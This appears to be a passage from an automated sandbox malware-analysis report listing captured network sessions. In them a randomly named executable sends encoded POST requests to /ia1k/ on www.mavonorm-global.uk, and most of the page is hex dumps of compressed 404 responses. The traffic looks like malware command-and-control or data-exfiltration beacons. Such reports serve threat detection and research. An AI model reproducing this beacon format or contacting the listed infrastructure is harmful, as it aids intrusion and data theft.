                                Data Ascii: 2C@E`:{So"hTK:KfB63X x4n#{oU_zk5pNk4>J\u[<f,fI2AJA8cv"6c"$H7>&x&U%bfCux>*#`tptvt>*v.kJBh#[*F%pO'ezqPc`!Idx`;W~>x7tj_GlLALoj';~KItUAC-r?^%8^5K=qTJc#K3r|mmsPore/i6~Hg2L>-AQ"v8'iv;=mfDk4[6WSSI*e4fhZR*-E:{ CCIowjlI;M}G6SsjCh1x`c6i"aO^C3krfOL4]I_|'\dn{kN{9yWW[tBRzg&^=j@WUe3Goz<iIPPQtl|t7OG,}u7A}tU/
                                May 28, 2024 07:16:40.598783970 CEST1236INData Raw: 1b a1 dd 84 c8 04 3a 1e 9e cf df 1f b0 dd c6 0f d8 c4 fc e8 3a cd fe 7e 4e f9 9c 49 05 1d a7 2c cb 4d 3d 26 c1 8c c0 85 6e 5b 6e 3b e9 52 e3 9a cd b6 08 97 c5 20 e4 03 5d cc dc 6e 69 f6 d4 32 2d 81 0b 6d c4 06 ed be cb 66 0c 4f 58 0a a2 e4 ef ba
                                Data Ascii: ::~NI,M=&n[n;R ]ni2-mfOX1i+Vn*f6z>R[+5~[wj.p\A9U/" 2#UR01UA97"m>R!VuSmN6_sCE
                                May 28, 2024 07:16:40.598793983 CEST448INData Raw: 79 1a 84 e8 34 10 d1 69 10 e2 d3 40 c4 a7 41 48 4e 03 91 9c 06 21 3d 0d 40 7a fa d3 19 ad f1 ca eb 42 e4 bc d1 bb 29 08 66 b3 d9 4c 8b b6 94 f3 7a 74 a5 5e dc e4 8d 64 84 19 99 c9 d9 bd b0 58 94 a1 64 2f 1c 08 82 25 56 1f 3e 84 4d b1 08 a2 b3 d1
                                Data Ascii: y4i@AHN!=@zB)fLzt^dXd/%V>MG@]T*$0B^Y}W!*birU4I@0)RR8$Xe?.a)3[h*#Dq/#c[T>f\6e"o[
                                May 28, 2024 07:16:40.598800898 CEST1236INData Raw: 34 14 0c ec 28 94 38 6e c9 59 ac 0f 61 90 63 5d d8 4e a3 aa 0b b5 fe 7f 68 8e 15 9c 77 a3 76 b1 34 ef 60 34 0b c6 cd 8e b7 63 42 1f 80 03 ef 64 e0 38 3b 5e 9f 5f 52 8c c0 82 3f f7 e6 69 63 9a 6b 79 45 a3 17 2b a6 55 09 20 b1 a5 d3 80 07 03 4c 8b
                                Data Ascii: 4(8nYac]Nhwv4`4cBd8;^_R?ickyE+U LrS>LBC&*`<jjC*X(Gdx}w'Kf&)B/:^.jH)>fn;p3qq3)aHPsMeIqWX2?_:\@r
                                May 28, 2024 07:16:40.598808050 CEST1236INData Raw: 5d 73 95 c5 d9 76 ab 3c 27 ac 3e d6 c7 87 5e 88 95 6c 86 16 8f c5 e4 22 f8 66 c1 92 e1 a2 b0 c4 42 22 b1 ba ab 64 b4 67 8b 13 42 35 b8 a7 5c f6 a3 94 5a 67 bb 0b 91 32 c0 09 08 eb bd 9a 45 2c bb a5 80 91 1c ef 30 9f 2c a1 4b 8f 34 5d 60 55 4a 0d
                                Data Ascii: ]sv<'>^l"fB"dgB5\Zg2E,0,K4]`UJl}[5(8,)i.mWSo1F_kR7,Y(;ryt|pC1J.I<2q&vEnF4[\sf9OUV5p]qMs4JPt*-^i4
                                May 28, 2024 07:16:40.598818064 CEST1236INData Raw: 62 db 12 3f 3e 21 22 4d 60 fe bc 38 21 71 82 25 33 c8 c0 fb 0e cf 08 27 a9 ac a7 97 da 1c dd b7 64 be 40 44 84 90 d9 6a b5 61 38 4a ac 64 ec 33 69 42 f2 7c 8d 0d 9a 70 8f 85 ae a2 02 4f 49 1c bf 01 3a df 4a 9c 9d 11 29 26 28 f3 5f 5a 9a 11 91 af
                                Data Ascii: b?>!"M`8!q%3'd@Dja8Jd3iB|pOI:J)&(_ZYV6m[\!W|mBV%)!Wq|bNHLJP "ch(!_#w=a}>Nr?p=+f%O`yW.}^L{9)`W~#=
                                May 28, 2024 07:16:40.598830938 CEST1236INData Raw: 11 2a 62 33 ad ea 60 ae 48 0d 70 6d b8 c3 93 4e 70 5e 0e e2 33 f4 cc b4 86 a4 dc b8 5b be 80 8d 49 97 16 eb cc a4 d9 b6 50 19 83 c8 6d c6 10 5a ac 76 ec 7e 2c 9d d4 4a c9 db a5 9f 26 8c c7 42 e3 1d 17 a1 e3 48 6d 17 62 28 2d f1 dd 9c 54 18 9d 1f
                                Data Ascii: *b3`HpmNp^3[IPmZv~,J&BHmb(-Tp{I`}:V(RZf'c}H$gNs7.E2=.O5L4KO"sq#jH<rf">%da%;3Rll,E61]q&:q|b
                                May 28, 2024 07:16:40.598841906 CEST1236INData Raw: 7f 1d 80 4d dd c1 37 03 87 87 03 c5 99 9a c1 aa 59 1a 83 69 8b 46 94 9b 34 85 2a ab 3e 86 d0 a0 f0 39 ca 6a b5 38 73 05 b5 d1 1d c5 92 84 ee cc 24 90 7b d6 85 cc d1 8f fe be b1 a8 11 a6 71 e4 82 59 ce d2 34 ab be 00 e7 e4 89 f1 ca aa 86 34 b5 3a
                                Data Ascii: M7YiF4*>9j8s${qY44:S:ex;3&`1*\1-g|}Wpc-7fEfULyC=EA!y.2QpR(g"w=;?q HHTwV$)
                                May 28, 2024 07:16:40.598853111 CEST1236INData Raw: 54 39 01 bd b8 a1 a2 8d 0d 76 6b 34 48 26 b9 ce 34 e0 24 0a 66 26 5a 52 a1 61 b7 70 c8 79 6e 7c 2d f0 7f af a3 75 30 0b 66 2a 8d b7 2e 6f 25 54 30 6d bb b4 d3 7d 18 53 7a d8 d1 e8 12 f6 8a 2a c6 aa 41 2c 20 e5 49 cf 82 d9 63 dc 64 87 2b 1b b3 e0
                                Data Ascii: T9vk4H&4$f&ZRapyn|-u0f*.o%T0m}Sz*A, Icd+R~y\uVs-iE8mm!ZYZs:Gy3h^dFfSZGQ{jBz*p&*P+m6BfFvJSW(XQH}W~~N]tW3
                                May 28, 2024 07:16:40.598866940 CEST809INData Raw: 16 32 0a d0 5f 07 9a 73 c2 d9 f4 45 74 df 45 6e 1c 8b 7b 94 a4 b1 81 ab d1 94 87 41 c4 e9 af 77 b3 2c e0 e3 5c ea 7d 89 ec d0 ee 57 3b 12 c5 19 9f 21 9b 4c fa 73 1d 25 41 a7 fd b8 4f 23 ba fc 7b 14 36 a7 a3 68 bd 5c a6 e4 32 57 2b cc f2 aa 74 51
                                Data Ascii: 2_sEtEn{Aw,\}W;!Ls%AO#{6h\2W+tQ?+{}TYj;7]Pd,f} vci^3h`bm-Q,st|Zjt_Z[GblL,Pk.6?0o$"$"0][C


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                18192.168.2.64973092.205.15.157801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:16:42.377017021 CEST779OUTPOST /ia1k/ HTTP/1.1
                                Host: www.mavonorm-global.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 234
                                Origin: http://www.mavonorm-global.uk
                                Referer: http://www.mavonorm-global.uk/ia1k/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 41 35 69 58 34 36 63 2f 35 57 37 45 58 64 67 44 49 4b 75 76 4f 63 56 2f 46 77 6a 48 76 50 43 67 32 6d 74 7a 71 49 2b 4a 43 2b 4a 32 33 34 53 6f 30 55 7a 2b 53 31 72 7a 7a 69 6f 42 54 70 2b 33 69 34 74 39 4c 7a 51 55 7a 4a 79 64 35 69 34 4b 42 49 62 55 78 44 73 72 48 37 6b 50 66 52 55 69 76 4c 41 69 6f 57 6f 5a 4b 30 2b 78 73 30 58 4c 53 36 39 37 66 44 32 56 51 43 6d 6c 71 53 72 42 70 71 64 75 79 77 6a 6f 49 66 53 6b 4f 69 67 62 57 69 57 56 53 59 75 4a 72 48 62 41 7a 39 65 47 49 47 70 46 34 36 42 4b 66 39 37 39 5a 73 37 41 67 70 59 43 72 64 4d 46 51 44 63 44 59 4d 73 59 47 62 63 79 6f 41 5a 63 78 7a 4f 75 5a 54 34 77 64 34 6b 33 66 4b 4b 36 52 59 57 53 61 5a 57 2f 2b 77 3d 3d
                                Data Ascii: jTZPp=A5iX46c/5W7EXdgDIKuvOcV/FwjHvPCg2mtzqI+JC+J234So0Uz+S1rzzioBTp+3i4t9LzQUzJyd5i4KBIbUxDsrH7kPfRUivLAioWoZK0+xs0XLS697fD2VQCmlqSrBpqduywjoIfSkOigbWiWVSYuJrHbAz9eGIGpF46BKf979Zs7AgpYCrdMFQDcDYMsYGbcyoAZcxzOuZT4wd4k3fKK6RYWSaZW/+w==
                                May 28, 2024 07:16:43.217966080 CEST1236INHTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:16:42 GMT
                                Server: Apache
                                X-Powered-By: PHP/8.1.28
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Link: <https://mavonorm-global.uk/wp-json/>; rel="https://api.w.org/"
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Vary: Accept-Encoding
                                Content-Encoding: br
                                Content-Length: 10723
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 13 32 df 14 91 9a f4 43 40 45 60 dc c4 c7 3a cf f7 ff 7b 53 fb 6f eb e7 eb 86 9c da 22 05 0c 68 b5 54 b9 4b 3a 4b 66 d9 d2 be ad c9 c9 c1 12 b6 d5 ca 42 0f f0 36 1a fd 9f bf ec 33 1c 58 c6 90 20 da 10 78 be 34 d1 6e 90 23 86 e3 7b 6f 55 fd 5f af 9f 7a cf 6b c1 ba 35 70 4e 6b 34 f6 91 3e 4a 03 bb 5c 75 0b de eb d7 af 5b 3c c8 66 cd 2c 01 66 81 11 93 c4 49 dc 32 b6 81 83 c4 41 4a 41 14 38 f6 63 98 d6 ec bf 76 fb 0d 22 a2 02 a2 36 ed bd 86 da f1 63 a5 dd 09 22 8e 24 0a 48 db 37 19 cb 92 3e bf bd cf c2 04 05 93 c8 26 78 bb 26 87 d5 ba f7 55 25 09 fa 62 66 ef 1e 43 75 f6 de 78 3e 2a c6 0e 12 1f 23 60 74 1d 70 0d 98 74 76 85 74 bf c0 c1 3e cc a2 90 ed 13 15 2a 76 b9 97 18 2e 6b 4a 01 d1 42 c7 a0 68 ab d2 1d 23 90 5b 2a dd 46 25 70 99 4f c9 a2 f4 27 dc e2 65 7a 71 50 97 63 60 8c d2 21 97 49 91 cf 64 11 99 f2 0b ec 9b 85 de 78 60 97 86 ba 3b 57 88 12 7e bd 02 9f 8c c3 9d dd 3e 78 d3 b5 fd 37 d8 e6 74 d5 a2 e9 1d ca eb d8 6a 5f ef 17 47 6c f8 4c cb e5 41 9d 4c 6f ec 81 f2 6a 27 3b 7e 4b 49 c5 ad 80 b8 99 d4 [TRUNCATED]
                                Data Ascii: 2C@E`:{So"hTK:KfB63X x4n#{oU_zk5pNk4>J\u[<f,fI2AJA8cv"6c"$H7>&x&U%bfCux>*#`tptvt>*v.kJBh#[*F%pO'ezqPc`!Idx`;W~>x7tj_GlLALoj';~KItUAC-r?^%8^5K=qTJc#K3r|mmsPore/i6~Hg2L>-AQ"v8'iv;=mfDk4[6WSSI*e4fhZR*-E:{ CCIowjlI;M}G6SsjCh1x`c6i"aO^C3krfOL4]I_|'\dn{kN{9yWW[tBRzg&^=j@WUe3Goz<iIPPQtl|t7OG,}u7A}tU/
                                May 28, 2024 07:16:43.217991114 CEST1236INData Raw: 1b a1 dd 84 c8 04 3a 1e 9e cf df 1f b0 dd c6 0f d8 c4 fc e8 3a cd fe 7e 4e f9 9c 49 05 1d a7 2c cb 4d 3d 26 c1 8c c0 85 6e 5b 6e 3b e9 52 e3 9a cd b6 08 97 c5 20 e4 03 5d cc dc 6e 69 f6 d4 32 2d 81 0b 6d c4 06 ed be cb 66 0c 4f 58 0a a2 e4 ef ba
                                Data Ascii: ::~NI,M=&n[n;R ]ni2-mfOX1i+Vn*f6z>R[+5~[wj.p\A9U/" 2#UR01UA97"m>R!VuSmN6_sCE
                                May 28, 2024 07:16:43.218003988 CEST1236INData Raw: 79 1a 84 e8 34 10 d1 69 10 e2 d3 40 c4 a7 41 48 4e 03 91 9c 06 21 3d 0d 40 7a fa d3 19 ad f1 ca eb 42 e4 bc d1 bb 29 08 66 b3 d9 4c 8b b6 94 f3 7a 74 a5 5e dc e4 8d 64 84 19 99 c9 d9 bd b0 58 94 a1 64 2f 1c 08 82 25 56 1f 3e 84 4d b1 08 a2 b3 d1
                                Data Ascii: y4i@AHN!=@zB)fLzt^dXd/%V>MG@]T*$0B^Y}W!*birU4I@0)RR8$Xe?.a)3[h*#Dq/#c[T>f\6e"o[
                                May 28, 2024 07:16:43.218014956 CEST672INData Raw: 3d 88 41 a6 be ad 89 9c b2 d8 31 56 81 b5 1b 7e 31 e2 37 a6 77 8e f4 45 10 2a a3 77 27 cb e5 70 c1 23 1d ac 9d 6c 62 2a 9f 62 dc ca 94 d5 94 a7 a3 dd f5 35 d3 4d 85 b5 33 84 88 b1 40 22 e1 11 e3 6a d6 17 3f 6a 16 82 86 ba 1e 0e 6a 8e d2 7d c3 16
                                Data Ascii: =A1V~17wE*w'p#lb*b5M3@"j?jj}eGnXPtu7wP7PO^#H[)rd^vT=OyJE"!:T)p8b$Ge2+zr$&7k}AbnXEGw$"L6^Jf^
                                May 28, 2024 07:16:43.218020916 CEST1236INData Raw: 4a ae 50 d7 9e 74 1a 0f df 2a 2d 5e 69 9a a9 34 13 b0 98 b1 d9 d6 74 f2 eb c2 1c ce 33 4d 93 ad 54 89 9c 1b ab 64 b5 e1 7a 3b 50 15 f9 d0 ff 04 51 c4 57 69 fe 4a 23 51 37 f5 76 df a1 6d fa 4a 1b bf 06 3d 42 f2 28 17 4f 20 f3 2c de d6 88 58 0e 08
                                Data Ascii: JPt*-^i4t3MTdz;PQWiJ#Q7vmJ=B(O ,XswJ"P0a3x"z0UM{Ulg2FktgJrr+8KI`]V7<pV$Gd6%'0L~kcN^SSa,:\
                                May 28, 2024 07:16:43.218033075 CEST224INData Raw: 05 81 29 0a c5 f1 1f 60 ef a3 57 1f 7e a8 d0 23 85 3d f6 c5 0b c6 13 64 94 fe 7e aa 02 ea 4e 1d 86 50 b0 88 f4 18 81 3b 9f 02 5e 43 18 8a d3 19 a8 81 d1 a7 b6 fa 80 e1 0e 38 cb d2 0c e3 e9 9c bc 2f bf a5 97 33 06 52 a1 dd 6f 8f 14 8c e7 d1 9a 24
                                Data Ascii: )`W~#=d~NP;^C8/3Ro$>$/*b2$z]VAz"T;.^`w%`X?ML~U{32l:P4wF%I^+:7@ti) ?9
                                May 28, 2024 07:16:43.218044043 CEST1236INData Raw: 1e 7e ef 1a 78 94 3d 34 09 bc 4f cc af 06 7e 50 56 1d 4c df 10 f8 9f 7b b6 ec a9 ed 10 c0 47 62 c1 fd 3f 3c ad 7f 5f 49 8b c0 47 3b d6 4d 3f d2 13 18 a3 04 1c 3a d2 02 70 7f 03 29 45 1c 22 8f c3 30 12 70 60 32 49 e0 31 0f 96 ff fc 30 ef ba 1e af
                                Data Ascii: ~x=4O~PVL{Gb?<_IG;M?:p)E"0p`2I10l0MJz(-CnzX5I5.IRj~tLsG8xhUWp>.NoULR'R_o7.lK4m#0Af$.pRrCC[JP3
                                May 28, 2024 07:16:43.218056917 CEST1236INData Raw: 9e a3 42 73 29 fd 9e d2 c5 30 d6 9b 92 b9 de 68 1f 1c 01 0d a2 7b a1 f4 4a 5e 57 a4 92 77 48 ae 16 01 4b 26 f1 1e 7b 29 af 01 79 eb 69 34 de 50 24 ac 8a 23 1c 28 81 27 52 ef e4 d5 3d 87 e2 e3 1e 46 68 be 73 d7 c3 38 0c 31 de 8e c9 0d 25 24 d3 58
                                Data Ascii: Bs)0h{J^WwHK&{)yi4P$#('R=Fhs81%$XM#^[EI8/(sAVF%b~r_-s.h9M^<{qxd{n4$~6767E#_;k(y_lI_M ;'c%c#)L4^t#
                                May 28, 2024 07:16:43.218067884 CEST1236INData Raw: 17 9a 71 02 c1 31 d2 c7 76 89 fe ee 45 97 b5 0b 1e 70 03 ca d7 bd 70 7d 97 73 db 25 fe 3b 18 5f ba 97 6e 03 ba ee 23 97 a7 e3 23 ed 3e be 09 59 af c6 52 9d 64 6e 73 29 44 08 c9 63 12 53 12 e2 48 d6 9f c3 38 9a ae 14 e7 49 b2 92 4d de e8 55 9d 27
                                Data Ascii: q1vEpp}s%;_n##>YRdns)DcSH8IMU'84+kH_C*nB}kPf36EEx]$cv<!VPOF`J^lC+>y,A=} 0MqfQ2/1^qDaD_{
                                May 28, 2024 07:16:43.218079090 CEST104INData Raw: f3 c3 a5 42 31 82 6b 85 32 96 10 32 5e 14 c4 80 6b 21 57 ba d4 d1 85 d8 81 f3 ea 6b 7a ce 09 d8 38 b3 77 50 84 4c 00 10 cf 4e 75 ec eb 3b 98 46 75 54 44 11 1a ad 69 ba a8 51 45 10 41 9f a6 42 ce 2b af 59 eb a2 ea 82 83 ee 91 46 dd ce b0 bb f6 fe
                                Data Ascii: B1k22^k!Wkz8wPLNu;FuTDiQEAB+YFxC+D><I4`x
                                May 28, 2024 07:16:43.218820095 CEST1236INData Raw: 3a a1 39 fa 6b fa bd 3c 5d 0d fa e2 1b 54 4c a5 70 8e b8 6f 75 c6 69 00 6e 1a 27 8c 8a b7 97 79 d0 f6 12 98 db a0 34 2d 62 ac c8 d0 85 a9 fa d7 5d 25 a4 45 e4 62 43 10 28 70 09 00 1d 52 31 03 46 cc 50 59 3a 9b 6d 85 0d fa de ff b9 00 09 11 78 41
                                Data Ascii: :9k<]TLpouin'y4-b]%EbC(pR1FPY:mxAWydm@aX7B#_EBK)% er+L"qS`Mf49mRw,p\YCh i\(,(WDkk-z[Im;HT%-%=JMCh


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                19192.168.2.64973192.205.15.157801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:16:44.914307117 CEST1792OUTPOST /ia1k/ HTTP/1.1
                                Host: www.mavonorm-global.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 1246
                                Origin: http://www.mavonorm-global.uk
                                Referer: http://www.mavonorm-global.uk/ia1k/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 41 35 69 58 34 36 63 2f 35 57 37 45 58 64 67 44 49 4b 75 76 4f 63 56 2f 46 77 6a 48 76 50 43 67 32 6d 74 7a 71 49 2b 4a 43 2b 42 32 33 4c 61 6f 33 33 4c 2b 54 31 72 7a 73 53 6f 45 54 70 2f 6c 69 34 30 30 4c 7a 55 75 7a 4b 4b 64 34 45 73 4b 56 74 33 55 37 44 73 72 4b 62 6b 4b 62 52 56 6f 76 4c 51 75 6f 53 45 5a 4b 30 2b 78 73 33 50 4c 56 6f 46 37 5a 44 32 53 48 79 6d 70 35 43 72 74 70 75 49 62 79 77 75 66 49 4d 61 6b 4f 47 45 62 55 51 2b 56 5a 59 75 48 6d 6e 62 6d 7a 39 62 59 49 47 31 4a 34 35 63 76 66 39 50 39 5a 4a 36 70 6c 5a 63 74 78 66 41 33 41 79 30 61 52 4c 45 33 4b 72 49 50 75 78 6c 63 38 41 6d 6b 61 7a 67 34 50 75 35 46 53 49 71 73 4f 6f 76 57 66 4b 58 75 73 68 33 55 53 46 62 6a 38 37 30 51 79 4e 41 38 49 54 5a 61 2b 4b 70 78 75 42 53 38 30 74 45 58 79 30 7a 36 62 37 2f 70 4b 56 4f 67 52 72 4e 57 4d 4f 4b 65 48 5a 79 58 48 54 61 5a 59 78 55 42 33 68 4e 71 79 58 4a 30 59 54 71 48 54 79 33 57 61 4a 41 38 53 51 41 4c 44 4d 63 47 63 67 35 6e 4b 4c 53 56 78 31 72 41 31 78 49 2f [TRUNCATED]
                                Data Ascii: jTZPp=A5iX46c/5W7EXdgDIKuvOcV/FwjHvPCg2mtzqI+JC+B23Lao33L+T1rzsSoETp/li400LzUuzKKd4EsKVt3U7DsrKbkKbRVovLQuoSEZK0+xs3PLVoF7ZD2SHymp5CrtpuIbywufIMakOGEbUQ+VZYuHmnbmz9bYIG1J45cvf9P9ZJ6plZctxfA3Ay0aRLE3KrIPuxlc8Amkazg4Pu5FSIqsOovWfKXush3USFbj870QyNA8ITZa+KpxuBS80tEXy0z6b7/pKVOgRrNWMOKeHZyXHTaZYxUB3hNqyXJ0YTqHTy3WaJA8SQALDMcGcg5nKLSVx1rA1xI/uA/085JskkVpFYdadd7dyxRUURAdBBJkwIhmyQ+kUYNsU/mA04byoBeq2SGbXE3ge6vbxTSoYtiap6aTgw75lz3fUtVEBZZNX/LTwt4B6UAMoGu0S1HsWAQoVEU1p+gi1G7tJWMtNjt7UEOvzsFMARkiQfijS+LAELqIZkfn0S970yltICirBOq8bqqHxqxs9sBeqLK/ZJpxir6JXwm/Hvzjhbsvf7ao87PF5ZIMrDZ2jvrpblTHGIEZNazN1Uop9LvDLwodNrzAJ57RtrwN5K4+8D29z0t0VUzZA7c8eYdCvWBfhaj41X4Pkc6hUWinWiHznMd/c5yOTZDyitQM2ErV7gAvFeHqGrkpFpmKbxHHwMiPeAscfygq5TDwDZF3kNEWaMLFcwJRwELopqlbRn3fftGUz2mXYJH59HjR1qxwhc7DJ70723KlzzSFliRQwLPzB3VAa16OCoQ5R/ykGwANUCuysjSSNIIWIU4Q2VjkJIVObgpMvs3S8OtEeh5p9h5PMDZ9S5UMCRwIXM7ebcKSnAywtPnEQWLAR2tRVSssfBzeOJUYRATM+yTUDeblnoKoNUhlOQayCYbJThd4fg5zJ1BaruW7sR7mWnooaSTtEm7Pm5zonz0o+agUCNGDcEz/d8efTPmrnKBHnfGJFFu3dsSsauN+ZH [TRUNCATED]
                                May 28, 2024 07:16:45.672919989 CEST1236INHTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:16:45 GMT
                                Server: Apache
                                X-Powered-By: PHP/8.1.28
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Link: <https://mavonorm-global.uk/wp-json/>; rel="https://api.w.org/"
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Vary: Accept-Encoding
                                Content-Encoding: br
                                Content-Length: 10723
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 13 32 df 14 91 9a f4 43 40 45 60 dc c4 c7 3a cf f7 ff 7b 53 fb 6f eb e7 eb 86 9c da 22 05 0c 68 b5 54 b9 4b 3a 4b 66 d9 d2 be ad c9 c9 c1 12 b6 d5 ca 42 0f f0 36 1a fd 9f bf ec 33 1c 58 c6 90 20 da 10 78 be 34 d1 6e 90 23 86 e3 7b 6f 55 fd 5f af 9f 7a cf 6b c1 ba 35 70 4e 6b 34 f6 91 3e 4a 03 bb 5c 75 0b de eb d7 af 5b 3c c8 66 cd 2c 01 66 81 11 93 c4 49 dc 32 b6 81 83 c4 41 4a 41 14 38 f6 63 98 d6 ec bf 76 fb 0d 22 a2 02 a2 36 ed bd 86 da f1 63 a5 dd 09 22 8e 24 0a 48 db 37 19 cb 92 3e bf bd cf c2 04 05 93 c8 26 78 bb 26 87 d5 ba f7 55 25 09 fa 62 66 ef 1e 43 75 f6 de 78 3e 2a c6 0e 12 1f 23 60 74 1d 70 0d 98 74 76 85 74 bf c0 c1 3e cc a2 90 ed 13 15 2a 76 b9 97 18 2e 6b 4a 01 d1 42 c7 a0 68 ab d2 1d 23 90 5b 2a dd 46 25 70 99 4f c9 a2 f4 27 dc e2 65 7a 71 50 97 63 60 8c d2 21 97 49 91 cf 64 11 99 f2 0b ec 9b 85 de 78 60 97 86 ba 3b 57 88 12 7e bd 02 9f 8c c3 9d dd 3e 78 d3 b5 fd 37 d8 e6 74 d5 a2 e9 1d ca eb d8 6a 5f ef 17 47 6c f8 4c cb e5 41 9d 4c 6f ec 81 f2 6a 27 3b 7e 4b 49 c5 ad 80 b8 99 d4 [TRUNCATED]
                                Data Ascii: 2C@E`:{So"hTK:KfB63X x4n#{oU_zk5pNk4>J\u[<f,fI2AJA8cv"6c"$H7>&x&U%bfCux>*#`tptvt>*v.kJBh#[*F%pO'ezqPc`!Idx`;W~>x7tj_GlLALoj';~KItUAC-r?^%8^5K=qTJc#K3r|mmsPore/i6~Hg2L>-AQ"v8'iv;=mfDk4[6WSSI*e4fhZR*-E:{ CCIowjlI;M}G6SsjCh1x`c6i"aO^C3krfOL4]I_|'\dn{kN{9yWW[tBRzg&^=j@WUe3Goz<iIPPQtl|t7OG,}u7A}tU/
                                May 28, 2024 07:16:45.672935963 CEST224INData Raw: 1b a1 dd 84 c8 04 3a 1e 9e cf df 1f b0 dd c6 0f d8 c4 fc e8 3a cd fe 7e 4e f9 9c 49 05 1d a7 2c cb 4d 3d 26 c1 8c c0 85 6e 5b 6e 3b e9 52 e3 9a cd b6 08 97 c5 20 e4 03 5d cc dc 6e 69 f6 d4 32 2d 81 0b 6d c4 06 ed be cb 66 0c 4f 58 0a a2 e4 ef ba
                                Data Ascii: ::~NI,M=&n[n;R ]ni2-mfOX1i+Vn*f6z>R[+5~[wj.p\A9U/" 2#UR01UA97"m>R!VuS
                                May 28, 2024 07:16:45.672950983 CEST1236INData Raw: c0 9a 6d 8d fd 4e d5 fb d7 1d db a7 36 5f f4 73 e5 43 45 34 e9 71 22 c6 a6 3d 0c 09 0f 3e 07 a4 94 76 6c df 62 e9 99 b3 75 a5 89 67 8d de 6a 5b dd 70 d2 32 f3 c5 36 78 4e e8 f1 c4 ea df d3 1f d6 1c 5a a7 e7 f3 d0 54 e8 3c 7c a7 d7 6a 8f f2 76 3f
                                Data Ascii: mN6_sCE4q"=>vlbugj[p26xNZT<|jv?[IH=g7wZN"U)':h}_jt&k]Ikgm(UHCWP;u^B5*^92":SA+7P996X{L%`prcnx%8
                                May 28, 2024 07:16:45.672960043 CEST1236INData Raw: 5c fc 36 02 9b 8e 12 16 84 e9 7f 65 22 d9 6f e3 ff 5b e4 57 6a d3 04 e4 35 ed 10 25 b5 fe f2 0e 7e 6c 1b 7d 5f e3 e5 6b 0a 87 a3 4f 41 ae 1f 0c 7b e5 a0 37 e3 21 b3 04 bc 81 a1 ae 1a 0c 14 e2 48 95 8c a0 1d 84 48 93 41 0c a3 3e d6 bd 86 00 57 f4
                                Data Ascii: \6e"o[Wj5%~l}_kOA{7!HHA>W=plhx7WA+K.$3`$t2#9dxN=1<iD;@gJVi0)[WC`B16GDu58lbE;;4(8nYac]N
                                May 28, 2024 07:16:45.672970057 CEST448INData Raw: 45 04 47 a4 a3 77 24 d7 bd 22 4c 36 bb ce 5e 4a 85 66 5e 63 30 a7 53 66 82 59 7b d8 25 98 b8 a3 41 34 af 04 82 30 0a 2a 4e 4e 83 59 2b 22 76 05 b3 99 99 8d 2a 8f df 9d 5e 16 2b b9 41 e4 38 09 38 21 99 bd 94 23 d7 d9 f0 52 9f 9f 33 9e 81 b0 4a fa
                                Data Ascii: EGw$"L6^Jf^c0SfY{%A40*NNY+"v*^+A88!#R3J3<X23DY%OCKgq$tILD[zJ?LD<33RQ^ZQK!;J$rDDDIay`&/CE]ZLqla(wRN@T0]sv<'>^l
                                May 28, 2024 07:16:45.672987938 CEST1236INData Raw: 4a ae 50 d7 9e 74 1a 0f df 2a 2d 5e 69 9a a9 34 13 b0 98 b1 d9 d6 74 f2 eb c2 1c ce 33 4d 93 ad 54 89 9c 1b ab 64 b5 e1 7a 3b 50 15 f9 d0 ff 04 51 c4 57 69 fe 4a 23 51 37 f5 76 df a1 6d fa 4a 1b bf 06 3d 42 f2 28 17 4f 20 f3 2c de d6 88 58 0e 08
                                Data Ascii: JPt*-^i4t3MTdz;PQWiJ#Q7vmJ=B(O ,XswJ"P0a3x"z0UM{Ulg2FktgJrr+8KI`]V7<pV$Gd6%'0L~kcN^SSa,:\
                                May 28, 2024 07:16:45.673003912 CEST224INData Raw: 05 81 29 0a c5 f1 1f 60 ef a3 57 1f 7e a8 d0 23 85 3d f6 c5 0b c6 13 64 94 fe 7e aa 02 ea 4e 1d 86 50 b0 88 f4 18 81 3b 9f 02 5e 43 18 8a d3 19 a8 81 d1 a7 b6 fa 80 e1 0e 38 cb d2 0c e3 e9 9c bc 2f bf a5 97 33 06 52 a1 dd 6f 8f 14 8c e7 d1 9a 24
                                Data Ascii: )`W~#=d~NP;^C8/3Ro$>$/*b2$z]VAz"T;.^`w%`X?ML~U{32l:P4wF%I^+:7@ti) ?9
